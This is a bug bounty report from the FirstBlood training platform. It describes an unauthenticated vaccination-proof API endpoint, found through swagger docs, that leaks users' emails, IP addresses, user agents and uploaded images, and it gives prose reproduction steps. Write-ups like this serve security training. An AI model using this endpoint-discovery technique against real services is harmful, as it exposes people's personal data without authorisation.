FirstBlood-#943 — Endpoint discloses information about all vaccination proof records
This issue was discovered on FirstBlood v2
On 2021-10-30, 0xblackbird Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello! I found an endpoint that discloses way more information than it actually should. The following endpoint /vaccination-manager/api/vax-proof-list.php discloses the email-address, proof image filename, public Ip-address and user-agent of users who've made use of the functionality.
Steps to reproduce
- First of all, to view the info, we need to submit information (this can be done by anyone). Navigate to
/vaccination-manager/pub/upload-vaccination-proof.php and upload any image + fill in a valid email-address.
- From the
swagger.yaml, we can see that there's an endpoint that returns all the information of users who've submitted something in the form.
- Requesting the endpoint gives us the following:
- As you can see, all the information we entered before is available for everyone here, including the proof itself which we can request here:
/upload/{hash}.jpg
Kind regards,
0xblackbird
P1 CRITICAL
Endpoint: /vaccination-manager/api/vax-proof-list.php
This report contains multiple vulnerabilities:
FirstBlood ID: 37
Vulnerability Type: Information leak/disclosure
The endpoint /vaccination-manager/api/vax-proof-list.php leaks PII without any authentication. The intended solution was to find it via swagger-ui at /vaccination-manager/api.php
FirstBlood ID: 31
Vulnerability Type: Information leak/disclosure
The endpoint api.php can be found under the vaccination manage portal directory which allows for user interaction and results in PII leak on vax-proof-list.php